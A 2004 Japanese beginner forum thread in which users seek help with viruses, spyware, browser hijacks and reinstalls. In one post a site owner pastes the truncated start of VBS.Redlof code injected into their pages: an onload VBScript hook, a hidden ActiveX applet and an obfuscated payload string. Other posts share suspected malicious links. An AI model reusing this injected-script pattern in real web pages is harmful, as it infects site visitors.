721 :初心者R:04/08/03 08:03 ID:Hhrxb52R
教えてください。
orgasmって名前のウイルスありますか?
消せないウィンドウ出たり、orgasmっていう作動しないプログラム?がデスクトップとかスタートメニューにいます。
ネット開くと海外エロサイトへ飛びます。
これウイルスですよね?
orgasmって名前のウイルスありますか?
消せないウィンドウ出たり、orgasmっていう作動しないプログラム?がデスクトップとかスタートメニューにいます。
ネット開くと海外エロサイトへ飛びます。
これウイルスですよね?
723 :初心者R:04/08/03 08:14 ID:Hhrxb52R
レスありがとうございます。
でも初心者なので用語わかりません...
テンプレって何ですか?
でも初心者なので用語わかりません...
テンプレって何ですか?
724 :ひよこ名無しさん:04/08/03 08:16 ID:Hhrxb52R
スパイウェアってなんですか?
用語は自分で
教えて厨UZEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
PCがまともに使えなくなってから2ヶ月が過ぎました。
その間自分で色々やりましたが、もうお手上げです。
すみませんが、教えて下さい。
(windowsXPです)
1・まず5月にsasserに感染しました。この時はリカバリして使えるようになりました。
2・6月にまたsasseに感染しました。リカバリしても駄目で、ノートンではW32spybot.worm
や、その他5種類くらいのウィルスが見つかり、ノートンでは「削除できません」と出て
しまいます。PCがまったく動かなくなり、もちろんネットにも繋げません。終了さえ出来なく
なりました。
3・なんとか、リカバリして、ウィルスバスター2004を入れて、今に至ります。
しかし、バスターでウィルスは発見されていないのですが、PCがどうもおかしいのです。
電源を入れると、しばらくして「システムは深刻なエラーから回復されました。この症状を
windowsに送信するorしない」みたいな画面が出まして、再起動してしまいます。
再起動は1回のみです。ネットに繋ぐと、「サーバーが見つかりません」と出てしまいますが、
「更新」をするとちゃんと見れるようになります。後、速度がすごく遅くなりました。
光なのですが、ISDNの速度くらいになりました。
これはウィルスがまだいるのでしょうか?それとも他に何か問題があるのでしょうか?
その間自分で色々やりましたが、もうお手上げです。
すみませんが、教えて下さい。
(windowsXPです)
1・まず5月にsasserに感染しました。この時はリカバリして使えるようになりました。
2・6月にまたsasseに感染しました。リカバリしても駄目で、ノートンではW32spybot.worm
や、その他5種類くらいのウィルスが見つかり、ノートンでは「削除できません」と出て
しまいます。PCがまったく動かなくなり、もちろんネットにも繋げません。終了さえ出来なく
なりました。
3・なんとか、リカバリして、ウィルスバスター2004を入れて、今に至ります。
しかし、バスターでウィルスは発見されていないのですが、PCがどうもおかしいのです。
電源を入れると、しばらくして「システムは深刻なエラーから回復されました。この症状を
windowsに送信するorしない」みたいな画面が出まして、再起動してしまいます。
再起動は1回のみです。ネットに繋ぐと、「サーバーが見つかりません」と出てしまいますが、
「更新」をするとちゃんと見れるようになります。後、速度がすごく遅くなりました。
光なのですが、ISDNの速度くらいになりました。
これはウィルスがまだいるのでしょうか?それとも他に何か問題があるのでしょうか?
なるほどそういうことですたか。
とりあえず調べてみます。
とりあえず調べてみます。
733 :728:04/08/03 10:19 ID:NMrxWQXK
※E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)
すみません。↑守ってませんでした。
リカバリですか・・・。
というか、今まで何度もリカバリしたのに、ウィルスの症状みたいのは消えないのは
ちゃんとリカバリ出来てない、という事なのかも・・・と思っています。
バスターが邪魔してるのか?とか考えてみたり。
すみません。↑守ってませんでした。
リカバリですか・・・。
というか、今まで何度もリカバリしたのに、ウィルスの症状みたいのは消えないのは
ちゃんとリカバリ出来てない、という事なのかも・・・と思っています。
バスターが邪魔してるのか?とか考えてみたり。
>>733
違うよ。ネットに繋いだ瞬間に感染してるんだろ。
違うよ。ネットに繋いだ瞬間に感染してるんだろ。
735 :ひよこ名無しさん:04/08/03 10:23 ID:RGTmiYRb
Spyware Doctor
Unable to create log.Please reinstall program.
ok
PCを起動すると、毎回、この様な小さなウインドウが出てきます(汗)
どうしたらいいのでしょうか?
Unable to create log.Please reinstall program.
ok
PCを起動すると、毎回、この様な小さなウインドウが出てきます(汗)
どうしたらいいのでしょうか?
737 :ひよこ名無しさん:04/08/03 10:25 ID:RGTmiYRb
>>737
ad-awareもな。
ad-awareもな。
740 :ひよこ名無しさん:04/08/03 10:28 ID:RGTmiYRb
743 :ひよこ名無しさん:04/08/03 10:31 ID:RGTmiYRb
>>733
ちゃんと型番書け。
最初からXPが入ってる機種なんてたぶん1000種類以上あるぞ。
メモリが128MBでバスター入れれば重くなって当然だし、
バスターがブロックできないスパイウエアで重くなってる可能性もある。
ちゃんと型番書け。
最初からXPが入ってる機種なんてたぶん1000種類以上あるぞ。
メモリが128MBでバスター入れれば重くなって当然だし、
バスターがブロックできないスパイウエアで重くなってる可能性もある。
>1・まず5月にsasserに感染しました。この時はリカバリして使えるようになりました。
>2・6月にまたsasseに感染しました。
Windows Updateしてるかもあやすぃ
>2・6月にまたsasseに感染しました。
Windows Updateしてるかもあやすぃ
746 :728:04/08/03 11:34 ID:bUJTDBLU
>>744
説明不足すみません。
使ってるPCはSONY VAIO PCV−W500です。
(WindowsXP HomeEdition)
スパイウェアで重くなるんですか・・・。Ad-Awareというのが駆除してくれる
ようなので、それをいれてみます。
>>745
それはちゃんとしています。
説明不足すみません。
使ってるPCはSONY VAIO PCV−W500です。
(WindowsXP HomeEdition)
スパイウェアで重くなるんですか・・・。Ad-Awareというのが駆除してくれる
ようなので、それをいれてみます。
>>745
それはちゃんとしています。
>>746
これね。
http://www.vaio.sony.co.jp/Products/PCV-W500/spec_master.html
最近の悪質なスパイウエアはAd-Aware対策してて、駆除できないのも多い。
あと、強制終了とかのせいで、いろんな設定が無効になって重くなることもある。
ピンとこない場合は、リカバリするほうが早い。
これね。
http://www.vaio.sony.co.jp/Products/PCV-W500/spec_master.html
最近の悪質なスパイウエアはAd-Aware対策してて、駆除できないのも多い。
あと、強制終了とかのせいで、いろんな設定が無効になって重くなることもある。
ピンとこない場合は、リカバリするほうが早い。
748 :ひよこ名無しさん:04/08/03 11:49 ID:RGTmiYRb
>>735です。言われた通りadawareもやったのですが、まだ・・・
どうしたらいいのでしょうか(汗)
どうしたらいいのでしょうか(汗)
>>748
※2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
※2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
751 :735:04/08/03 11:56 ID:RGTmiYRb
752 :728:04/08/03 12:02 ID:bUJTDBLU
>>747
そのPCです。
Ad-Awareいれてみて、症状がなくならないようだったら、リカバリするしか
ないのか・・・(><
長々と申し訳ないのですが、Cドライブの中に、「xerox」とかいう訳のわからない0バイトの
ファイルがいつのまにかありまして、削除も出来ないんです。
家に帰ったら、セーフモードで起動して削除を試してみたいと思ってますが、
普通リカバリしたら、そんなファイルも消えるんじゃないんでしょうか?
ところが、何度リカバリしてもその0バイトのファイルは消えずに残ってるんです。
リカバリがちゃんと出来てない、のも疑った方がよいですかね?
そのPCです。
Ad-Awareいれてみて、症状がなくならないようだったら、リカバリするしか
ないのか・・・(><
長々と申し訳ないのですが、Cドライブの中に、「xerox」とかいう訳のわからない0バイトの
ファイルがいつのまにかありまして、削除も出来ないんです。
家に帰ったら、セーフモードで起動して削除を試してみたいと思ってますが、
普通リカバリしたら、そんなファイルも消えるんじゃないんでしょうか?
ところが、何度リカバリしてもその0バイトのファイルは消えずに残ってるんです。
リカバリがちゃんと出来てない、のも疑った方がよいですかね?
753 :735:04/08/03 12:03 ID:RGTmiYRb
>>752
僕も「xerox」あります!!!
僕も「xerox」あります!!!
>>752
xeroxは正常なフォルダ。FAX機能用らしい。
xeroxは正常なフォルダ。FAX機能用らしい。
Ad-AwareやSpybot入れただけで駆除できると思ってないか?
それなら間違い。手動で削除しないといけない。
それなら間違い。手動で削除しないといけない。
756 :735:04/08/03 12:06 ID:RGTmiYRb
>>755
含まれているとしたら、どこが考えられますか?
含まれているとしたら、どこが考えられますか?
>>735
そのまま訳せば、ログファイルを作成できないから、インストールし直せ。
そのまま訳せば、ログファイルを作成できないから、インストールし直せ。
758 :670:04/08/03 12:26 ID:tXhoOG0x
本体を開けてびっくり、とても熱かったですw
ファンが壊れているらしく、ほこりがたまっていました。
こんなくだらない質問に答えてくださってありがとうございました。
ファンが壊れているらしく、ほこりがたまっていました。
こんなくだらない質問に答えてくださってありがとうございました。
760 :728:04/08/03 13:15 ID:E5mRGpH3
>>754
正常な機能だったんですかw
私もセーフモードでSpybotとAd-Awereやってみます。
もういいかげんに普通にPCを楽しみたい・・・。
何度か「更新」ボタンを連打すれば、ダウンロードできると思うので。
正常な機能だったんですかw
私もセーフモードでSpybotとAd-Awereやってみます。
もういいかげんに普通にPCを楽しみたい・・・。
何度か「更新」ボタンを連打すれば、ダウンロードできると思うので。
761 :ひよこ名無しさん:04/08/03 14:11 ID:g6uIB8M0
まったくの初心者です。
ノートンを開くと
購読サービス 期限切れ
とあります。
どーしたらいいのですか?
ノートンを開くと
購読サービス 期限切れ
とあります。
どーしたらいいのですか?
>>761
窓の手使え。
窓の手使え。
764 :ひよこ名無しさん:04/08/03 14:17 ID:g6uIB8M0
>>762窓の手とは、なんですか?
ありがとうございます。
ありがとうございます。
765 :ひよこ名無しさん:04/08/03 15:04 ID:T00J53+L
http://bubalom.by.ru/luisa/gallery1.html
おそらくブラクラかウィルスであろうURL↑を間違えて踏んでしまいました・・・
「ページが表示されません」とでたんですけど、この場合は被害は無いのでしょうか?
おそらくブラクラかウィルスであろうURL↑を間違えて踏んでしまいました・・・
「ページが表示されません」とでたんですけど、この場合は被害は無いのでしょうか?
また直リンか。
768 :ひよこ名無しさん:04/08/03 15:25 ID:T00J53+L
あ・・・ごめんなさい・・・間違えました・・・。
最低の屑ですね。ご迷惑をおかけしました・・・。
最低の屑ですね。ご迷惑をおかけしました・・・。
>>765を踏んでしまいました・・・責任とって下さい!!
770 :ひよこ名無しさん:04/08/03 15:29 ID:T00J53+L
>>769
本当にすみませんでした・・。
本当にすみませんでした・・。
772 :ひよこ名無しさん:04/08/03 15:44 ID:T00J53+L
>>772
SpywareBlasterでブロックされたんだよ。
問題は無いが、心配ならウィルス・Ad-aware等のチェックして終われ。
というか、質問する前に>>1読んで注意事項守れ。
>※2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
SpywareBlasterでブロックされたんだよ。
問題は無いが、心配ならウィルス・Ad-aware等のチェックして終われ。
というか、質問する前に>>1読んで注意事項守れ。
>※2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
774 :765:04/08/03 16:09 ID:T00J53+L
>>773
わかりました。アドバイス本当にありがとうございました。
変なURLを踏んでしまい、困惑して>>1も読まずに慌てて質問してしまいました。
自分のことしか考えず無礼で軽率な行為だったことを心から恥じお詫び申し上げます。
これからは注意事項を遵守し皆様に迷惑をかけないよう心掛けます。
本当にすみませんでした。
わかりました。アドバイス本当にありがとうございました。
変なURLを踏んでしまい、困惑して>>1も読まずに慌てて質問してしまいました。
自分のことしか考えず無礼で軽率な行為だったことを心から恥じお詫び申し上げます。
これからは注意事項を遵守し皆様に迷惑をかけないよう心掛けます。
本当にすみませんでした。
>>765
もう、サイトが潰れてそうだな
もう、サイトが潰れてそうだな
776 :ひよこ名無しさん:04/08/03 22:30 ID:p9W4FbUy
すみませんが教えてください。
恐らく php? を含むURLだとおもうのですが、
ランキングサイトなどから、ある特定のリンクをクリックすると
ttp://66.230.167.104/sout.php?fc=40
に飛びます。上記URLからランダムにアダルトサイトに飛びます。
ウィルススキャンはしたし、spy-bot ad-awareなど
あらゆる対策はしましたがまだ治りません。
WINXP IE6.0です どなたかご存知の方教えてください。
恐らく php? を含むURLだとおもうのですが、
ランキングサイトなどから、ある特定のリンクをクリックすると
ttp://66.230.167.104/sout.php?fc=40
に飛びます。上記URLからランダムにアダルトサイトに飛びます。
ウィルススキャンはしたし、spy-bot ad-awareなど
あらゆる対策はしましたがまだ治りません。
WINXP IE6.0です どなたかご存知の方教えてください。
>>776
自分はわかんないんだけど、こっちの方が人が多いし、詳しい人も多そうだよ。
エロサイト見たら…助けてください!Part35
http://pc6.2ch.net/test/read.cgi/pcqa/1091090092/
(もうすぐ次スレ)
エロサイト見たら…助けてください!Part36
http://pc6.2ch.net/test/read.cgi/pcqa/1091521211/
自分はわかんないんだけど、こっちの方が人が多いし、詳しい人も多そうだよ。
エロサイト見たら…助けてください!Part35
http://pc6.2ch.net/test/read.cgi/pcqa/1091090092/
(もうすぐ次スレ)
エロサイト見たら…助けてください!Part36
http://pc6.2ch.net/test/read.cgi/pcqa/1091521211/
>>776
こっち行った方がいいよ
テンプレよく読んで、やってないものを実行後質問してください
エロサイト見たら…助けてください!Part35
http://pc6.2ch.net/test/read.cgi/pcqa/1091090092/
こっち行った方がいいよ
テンプレよく読んで、やってないものを実行後質問してください
エロサイト見たら…助けてください!Part35
http://pc6.2ch.net/test/read.cgi/pcqa/1091090092/
779 :ひよこ名無しさん:04/08/04 00:27 ID:4ctuWkx7
突然の質問すみません。
「あなたのサイトのページでウィルスが検索されました」
というメールをいただいたのですがどうすれば良いかわからず。
オンラインでウィルス検索をしても全然ひっかからず
駆除をしたくてもウィルスの名前がわからないので確実な対処方がわかりません。
こういう時はどうしたら良いのでしょうか?PC初期化した方が良いんですかね?
なにかアドバイスありましたら教えてくれると助かります。
「あなたのサイトのページでウィルスが検索されました」
というメールをいただいたのですがどうすれば良いかわからず。
オンラインでウィルス検索をしても全然ひっかからず
駆除をしたくてもウィルスの名前がわからないので確実な対処方がわかりません。
こういう時はどうしたら良いのでしょうか?PC初期化した方が良いんですかね?
なにかアドバイスありましたら教えてくれると助かります。
780 :ひよこ名無しさん:04/08/04 00:28 ID:IiA4LnlL
・Panda/無償オンラインスキャン
http://www.pandasoftware.com/activescan/jp/activescan_principal.htm
オンラインスキャンにしては珍しく、ウィルスの駆除も可能です。
ただし滅茶苦茶時間が掛かります。※Internet Exprolerを使用してください
↑ここでスキャンしたいのですが、リンク先のページの一番上にある
「オンラインウィルスチェック」ってとこクリックしてもリンク切れのようだし
下の方の「無料体験版はこちらから」ってとこクリックすると
英文ばっかでわからんです。
どこをクリックすればスキャンできるのでしょうか?
無知ですみませんが教えてください。
http://www.pandasoftware.com/activescan/jp/activescan_principal.htm
オンラインスキャンにしては珍しく、ウィルスの駆除も可能です。
ただし滅茶苦茶時間が掛かります。※Internet Exprolerを使用してください
↑ここでスキャンしたいのですが、リンク先のページの一番上にある
「オンラインウィルスチェック」ってとこクリックしてもリンク切れのようだし
下の方の「無料体験版はこちらから」ってとこクリックすると
英文ばっかでわからんです。
どこをクリックすればスキャンできるのでしょうか?
無知ですみませんが教えてください。
782 :779:04/08/04 00:37 ID:4ctuWkx7
>>781
迅速な対応ありがとうございます!
自分も誤解かと思ったのですが、以前からサイトを作っているタグの最後に
打ったことの無いタグが組み込まれていたりしていて
今までそれを消してアップしていたんです。
出来ればそのタグをコピペでここに載せた方が1番早いんではないかと思ったのですが
掲示板自体に影響はありませんかね?
迅速な対応ありがとうございます!
自分も誤解かと思ったのですが、以前からサイトを作っているタグの最後に
打ったことの無いタグが組み込まれていたりしていて
今までそれを消してアップしていたんです。
出来ればそのタグをコピペでここに載せた方が1番早いんではないかと思ったのですが
掲示板自体に影響はありませんかね?
785 :ひよこ名無しさん:04/08/04 00:45 ID:IiA4LnlL
>>784
The page cannot be displayed.
There is a problem with the page you are trying to reach and it cannot be displayed.
--------------------------------------------------------------------------------
Please try the following:
Click the Refresh button, or try again later.
Open the www.pandasoftware.com home page, and then look for links to the information you want.
If you believe you should be able to view this directory or page, please contact the Web site administrator by using the e-mail address or phone number listed on the www.pandasoftware.com home page.
HTTP 502.1 - Unable to forward to host server
Internet Information Services
--------------------------------------------------------------------------------
って別窓で出るんですけど・・混みあってるってことでしょうか?
The page cannot be displayed.
There is a problem with the page you are trying to reach and it cannot be displayed.
--------------------------------------------------------------------------------
Please try the following:
Click the Refresh button, or try again later.
Open the www.pandasoftware.com home page, and then look for links to the information you want.
If you believe you should be able to view this directory or page, please contact the Web site administrator by using the e-mail address or phone number listed on the www.pandasoftware.com home page.
HTTP 502.1 - Unable to forward to host server
Internet Information Services
--------------------------------------------------------------------------------
って別窓で出るんですけど・・混みあってるってことでしょうか?
787 :ひよこ名無しさん:04/08/04 00:50 ID:IiA4LnlL
788 :ひよこ名無しさん:04/08/04 00:57 ID:IiA4LnlL
すみません。何度かやったら繋がりました。
789 :782:04/08/04 00:59 ID:4ctuWkx7
>>784
784さんの記事を見たので途中(理解不能なタグなど)はカットしたのを
用意したのですがこれでもノートン誤認識しますかね?
何かあったら恐いので大丈夫と確認が出来たら改めてコピペしたいと思います。
784さんの記事を見たので途中(理解不能なタグなど)はカットしたのを
用意したのですがこれでもノートン誤認識しますかね?
何かあったら恐いので大丈夫と確認が出来たら改めてコピペしたいと思います。
>>789
さらに、< と >を全角の<>に置換すれば、かなり安心。
さらに、< と >を全角の<>に置換すれば、かなり安心。
793 :789:04/08/04 01:04 ID:4ctuWkx7
>>783
<HTML>
<BODY onload="vbscript:KJ_start()">
<script language=vbscript>
document.write "
<div style='position:absolute; left:0px; top:0px;
width:0px; height:0px; z-index:28; visibility: hidden'>
<"&"APPLET NAME=KJ"&"_guest HEIGHT=0 WIDTH=0
code=com.ms."&"activeX.Active"&"XComponent></APPLET></div>"
</script>
<script language=vbscript>
ExeString = "=fhBkRa^o`%AqheMbsm%S]lMbsm%A``kb`Lbdi%:mke^
…最初は普通にタグが表示されているのですが、この後理解不明な
タグが永遠と5〜6行に渡って記述されているんです。
借りているホストはロリポップの有料で広告なども無いはずなのですが…
ウィルスでしたら名前だけでも教えていただけたら
最低限の対処が出来るかもしれませんのでよろしくお願いします!
<HTML>
<BODY onload="vbscript:KJ_start()">
<script language=vbscript>
document.write "
<div style='position:absolute; left:0px; top:0px;
width:0px; height:0px; z-index:28; visibility: hidden'>
<"&"APPLET NAME=KJ"&"_guest HEIGHT=0 WIDTH=0
code=com.ms."&"activeX.Active"&"XComponent></APPLET></div>"
</script>
<script language=vbscript>
ExeString = "=fhBkRa^o`%AqheMbsm%S]lMbsm%A``kb`Lbdi%:mke^
…最初は普通にタグが表示されているのですが、この後理解不明な
タグが永遠と5〜6行に渡って記述されているんです。
借りているホストはロリポップの有料で広告なども無いはずなのですが…
ウィルスでしたら名前だけでも教えていただけたら
最低限の対処が出来るかもしれませんのでよろしくお願いします!
794 :793:04/08/04 01:07 ID:4ctuWkx7
確かに大文字の「i」に変換したつもりなのですが…これは小文字!?
スミマセン!大丈夫でしょうか??
スミマセン!大丈夫でしょうか??
>>793
VBS.Redlof に感染してると思う。
これを検出できないってどんなワクチンソフトかな。
そのサーバ上のほかのページも感染してれば、ホストが感染してるけど、
自分のページだけなら、自分のPCが感染してることになる。
VBS.Redlof に感染してると思う。
これを検出できないってどんなワクチンソフトかな。
そのサーバ上のほかのページも感染してれば、ホストが感染してるけど、
自分のページだけなら、自分のPCが感染してることになる。
796 :793:04/08/04 01:12 ID:4ctuWkx7
始めまして。先日ウイルスに感染しデータが全て消えました。
それで再インスコを試みたんですがブート?の画面で
NTLDR IS MISSING
という文章が出て先に進めなくなりました。
この現象もウイルスと関係しているんでしょうか?
それで再インスコを試みたんですがブート?の画面で
NTLDR IS MISSING
という文章が出て先に進めなくなりました。
この現象もウイルスと関係しているんでしょうか?
ブートファイルが壊れてるとNTLDR Is Missingが出る
或いは、BIOSが古いときもNTLDR Is Missingが出る
ぐはっ
BackDoor...
BackDoor...
御愁傷様。
802 :ひよこ名無しさん:04/08/04 02:57 ID:3McPRz9I
>>776です。
かなり昔に同様の質問をエロサイト・・・スレで質問したのですが
「ウィルスです」と言われてそれっきり・・・(´д`;
テンプレはほとんど全部やりました
CWshredderもHijack thisも・・・でも治らないのです。
対処法ご存知の方を気長に待ちます…
かなり昔に同様の質問をエロサイト・・・スレで質問したのですが
「ウィルスです」と言われてそれっきり・・・(´д`;
テンプレはほとんど全部やりました
CWshredderもHijack thisも・・・でも治らないのです。
対処法ご存知の方を気長に待ちます…
805 :ひよこ名無しさん:04/08/04 07:26 ID:IiA4LnlL
・トレンドマイクロ/オンラインスキャン
http://www.trendmicro.co.jp/hcall/index.asp
で一回目検索。結果↓
ADW_SAFESEARCH.A
TROJ_CRYPTER.A
TROJ_DYFUCA.B
TROJ_DLUCA.F
TROJ_179.A
TROJ_DYFUCA.BX
TROJ_DYFUCA.M
がヒット。
・シマンテック セキュリティチェック
http://www.symantec.com/region/jp/securitycheck/index.html
で一回目検索。結果↓
c:\WINDOWS\SYSTEM\win32info.exe は Downloader.Dluca に感染しています。
c:\WINDOWS\SYSTEM\win32info-uninstall.exe は Download.Trojan に感染しています。
c:\Program Files\gikoNavi\Log\2ch\pcqa\1046764388.dat は
VBS.LoveLetter.Var に感染しています。
c:\Program Files\gikoNavi\Log\2ch\liventv\1084192429.dat は
VBS.LoveLetter.Var に感染しています。
c:\Program Files\gikoNavi\Log\2ch\livecx\1090475010.dat は
VBS.LoveLetter.Var に感染しています。
c:\Program Files\gikoNavi\Log\2ch\livecx\1090764710.dat は
VBS.Internal に感染しています。
で、・Panda/無償オンラインスキャン
http://www.pandasoftware.com/activescan/jp/activescan_principal.htm
で検索・駆除したところ↓のような結果に。
インシデント 状態 ロケーション
Virus:Trj/SysCenter.A 駆除 オペレーティングシステム
Virus:Trj/Small.R 駆除 C:\WINDOWS\SYSTEM\win32info-uninstall.exe
Virus:Trj/SysCenter.A 駆除 C:\WINDOWS\TEMP\wnk51f5.EXE
http://www.trendmicro.co.jp/hcall/index.asp
で一回目検索。結果↓
ADW_SAFESEARCH.A
TROJ_CRYPTER.A
TROJ_DYFUCA.B
TROJ_DLUCA.F
TROJ_179.A
TROJ_DYFUCA.BX
TROJ_DYFUCA.M
がヒット。
・シマンテック セキュリティチェック
http://www.symantec.com/region/jp/securitycheck/index.html
で一回目検索。結果↓
c:\WINDOWS\SYSTEM\win32info.exe は Downloader.Dluca に感染しています。
c:\WINDOWS\SYSTEM\win32info-uninstall.exe は Download.Trojan に感染しています。
c:\Program Files\gikoNavi\Log\2ch\pcqa\1046764388.dat は
VBS.LoveLetter.Var に感染しています。
c:\Program Files\gikoNavi\Log\2ch\liventv\1084192429.dat は
VBS.LoveLetter.Var に感染しています。
c:\Program Files\gikoNavi\Log\2ch\livecx\1090475010.dat は
VBS.LoveLetter.Var に感染しています。
c:\Program Files\gikoNavi\Log\2ch\livecx\1090764710.dat は
VBS.Internal に感染しています。
で、・Panda/無償オンラインスキャン
http://www.pandasoftware.com/activescan/jp/activescan_principal.htm
で検索・駆除したところ↓のような結果に。
インシデント 状態 ロケーション
Virus:Trj/SysCenter.A 駆除 オペレーティングシステム
Virus:Trj/Small.R 駆除 C:\WINDOWS\SYSTEM\win32info-uninstall.exe
Virus:Trj/SysCenter.A 駆除 C:\WINDOWS\TEMP\wnk51f5.EXE
806 :ひよこ名無しさん:04/08/04 07:28 ID:IiA4LnlL
これで削除できたのかな?と思って再度検索かけたところ
トレンドマイクロ/オンラインスキャンは前出と結果は同じ。
シマンテック セキュリティチェックだと
ADW_SAFESEARCH.Aは消えたものの他はそのまま。
さらにADW_SAFESEARCH.A というのが増えました。
現状を把握できないのですが、ウィルスは削除できていないのでしょうか?
OSはMeです。
トレンドマイクロ/オンラインスキャンは前出と結果は同じ。
シマンテック セキュリティチェックだと
ADW_SAFESEARCH.Aは消えたものの他はそのまま。
さらにADW_SAFESEARCH.A というのが増えました。
現状を把握できないのですが、ウィルスは削除できていないのでしょうか?
OSはMeです。
808 :806:04/08/04 07:34 ID:IiA4LnlL
>>807
えと、じゃあ
Virus:Trj/SysCenter.A 駆除 オペレーティングシステム
Virus:Trj/Small.R 駆除 C:\WINDOWS\SYSTEM\win32info-uninstall.exe
Virus:Trj/SysCenter.A 駆除 C:\WINDOWS\TEMP\wnk51f5.EXE
は意味無いってことでしょうか?
検出されたトロイ他を地道に関連サイトを見て消していくしか方法はないのでしょうか?
えと、じゃあ
Virus:Trj/SysCenter.A 駆除 オペレーティングシステム
Virus:Trj/Small.R 駆除 C:\WINDOWS\SYSTEM\win32info-uninstall.exe
Virus:Trj/SysCenter.A 駆除 C:\WINDOWS\TEMP\wnk51f5.EXE
は意味無いってことでしょうか?
検出されたトロイ他を地道に関連サイトを見て消していくしか方法はないのでしょうか?
>>808
Pandaで削除されたものは意味は無くはない。
ただ、このオンラインスキャンで発見できなかったウィルスは当然そのまま。
シマンテックやトレンドマイクロのオンラインスキャンでスキャンできた
ものは検出されたウィルスを地道に手動で削除するか、ウィルス対策ソフトを
購入してインストールし削除。
どれも完全というのは無い。最近のウィルスは対策ソフトの挙動をおかしくするものもあるしね。
Pandaで削除されたものは意味は無くはない。
ただ、このオンラインスキャンで発見できなかったウィルスは当然そのまま。
シマンテックやトレンドマイクロのオンラインスキャンでスキャンできた
ものは検出されたウィルスを地道に手動で削除するか、ウィルス対策ソフトを
購入してインストールし削除。
どれも完全というのは無い。最近のウィルスは対策ソフトの挙動をおかしくするものもあるしね。
811 :728:04/08/04 08:57 ID:7vyqLdtS
spybotとAd-Awereを入れたら、すごい数のスパイウェアが出ました〜。
多分これで安心してはいけないんだろうけど、快適に繋がるようになったし、
PCの反応もよくなりました。
どうもありがとうございました!!!!(><
多分これで安心してはいけないんだろうけど、快適に繋がるようになったし、
PCの反応もよくなりました。
どうもありがとうございました!!!!(><
812 :808:04/08/04 12:04 ID:IiA4LnlL
>>809-810
とても全て手動で駆除する知識も技術もないのですが
対策ソフトを購入すれば一発で自動的に駆除してくれるツールとかはあるのでしょうか?
(現在判明しているトロイ系の物を削除できればいいんですが)
また、駆除するツールと以後感染を防ぐ為のツールは別々なんでしょうか?
とても全て手動で駆除する知識も技術もないのですが
対策ソフトを購入すれば一発で自動的に駆除してくれるツールとかはあるのでしょうか?
(現在判明しているトロイ系の物を削除できればいいんですが)
また、駆除するツールと以後感染を防ぐ為のツールは別々なんでしょうか?
>>812
無いよ、そんなもの
対策ソフトと駆除ツールは違うし
対策ソフト入れたといしても、あんたの場合トロイにやられてレジストリ改変されてるから、
手動で修復しないと直らないね(ウィルスとトロイは別物)
それが出来ないならOS再インストール
対策ソフト入れてないのが悪い
今後のためにここでも読んでみたら?
ウィルス対策スクール
http://www.ipa.go.jp/security/y2k/virus/cdrom/index.html
無いよ、そんなもの
対策ソフトと駆除ツールは違うし
対策ソフト入れたといしても、あんたの場合トロイにやられてレジストリ改変されてるから、
手動で修復しないと直らないね(ウィルスとトロイは別物)
それが出来ないならOS再インストール
対策ソフト入れてないのが悪い
今後のためにここでも読んでみたら?
ウィルス対策スクール
http://www.ipa.go.jp/security/y2k/virus/cdrom/index.html
814 :ひよこ名無しさん:04/08/04 12:37 ID:IiA4LnlL
>>813
OSの再インストールとはどうしたらできるのでしょうか?
再インストールするとトロイは無効化されるのでしょうか?
また再インストールするとどんな影響がありますか?
どうしようもない質問ばかりですみませんが・・
OSの再インストールとはどうしたらできるのでしょうか?
再インストールするとトロイは無効化されるのでしょうか?
また再インストールするとどんな影響がありますか?
どうしようもない質問ばかりですみませんが・・
>>814=ねた
817 :805:04/08/04 12:44 ID:IiA4LnlL
818 :805:04/08/04 12:48 ID:IiA4LnlL
>>813
OSの再インストールとはどうしたらできるのでしょうか?
再インストールするとトロイは無効化されるのでしょうか?
また再インストールするとどんな影響がありますか?
どうしようもない質問ばかりですみませんが・・
OSの再インストールとはどうしたらできるのでしょうか?
再インストールするとトロイは無効化されるのでしょうか?
また再インストールするとどんな影響がありますか?
どうしようもない質問ばかりですみませんが・・
>>818
本当にどうしようも無いな。
>OSの再インストールとはどうしたらできるのでしょうか?
取説に書いてある。
>再インストールするとトロイは無効化されるのでしょうか?
なる。まぁ、例外は無くは無いが。
>また再インストールするとどんな影響がありますか?
ある種のデータが消える。大事なデータはバックアップを取る。
というか、スパイウェア、ウィルスに感染する以前からバックアップは必要。
本当にどうしようも無いな。
>OSの再インストールとはどうしたらできるのでしょうか?
取説に書いてある。
>再インストールするとトロイは無効化されるのでしょうか?
なる。まぁ、例外は無くは無いが。
>また再インストールするとどんな影響がありますか?
ある種のデータが消える。大事なデータはバックアップを取る。
というか、スパイウェア、ウィルスに感染する以前からバックアップは必要。
821 :ひよこ名無しさん:04/08/04 17:46 ID:LsvCDD7B
2、3日前ぐらいから以下の内容のダイアログが
ずっと出つづけてて止まりません…
「エラーが発生したため、system.exeを終了します。プログラムをもう一度
開始する必要があります。
エラー ログを作成しています。」
オンラインスキャンやノートン(アップデート済)でもウイルス検索したのですが
それらしいウイルスが検出されず、未だにダイアログが止まりません…
もしかしてこれってウイルスじゃないのでしょうか・・?
OSはwin2000 SP4です。
ずっと出つづけてて止まりません…
「エラーが発生したため、system.exeを終了します。プログラムをもう一度
開始する必要があります。
エラー ログを作成しています。」
オンラインスキャンやノートン(アップデート済)でもウイルス検索したのですが
それらしいウイルスが検出されず、未だにダイアログが止まりません…
もしかしてこれってウイルスじゃないのでしょうか・・?
OSはwin2000 SP4です。
>>821
スパイウェアの可能性が高いかもな
スパイウェアの可能性が高いかもな
823 :ひよこ名無しさん:04/08/04 17:49 ID:omNMQPwS
exeファイルって、削除してはいけないんですか?
それと、おすすめのブラウザとかありましたら教えてください。
よろしくお願いします。
それと、おすすめのブラウザとかありましたら教えてください。
よろしくお願いします。
誤爆しました・・・
すいません。
すいません。
825=823です。
>>824さん、答えてくださってありがとうございました。
>>824さん、答えてくださってありがとうございました。
>>825
誰、お前?
誰、お前?
829 :821:04/08/04 18:10 ID:LsvCDD7B
さげてしまった…すみません
832 :821:04/08/04 18:21 ID:LsvCDD7B
検出されたものは削除しましたが直りませんでした
対処法をきいてるんですが…
対処法をきいてるんですが…
835 :821:04/08/04 18:46 ID:LsvCDD7B
>>831
レジストリ内ってCドライブでいいんでしょうか?
Cドライブ検索しましたがsystem.exe見つかりませんでした
>>833
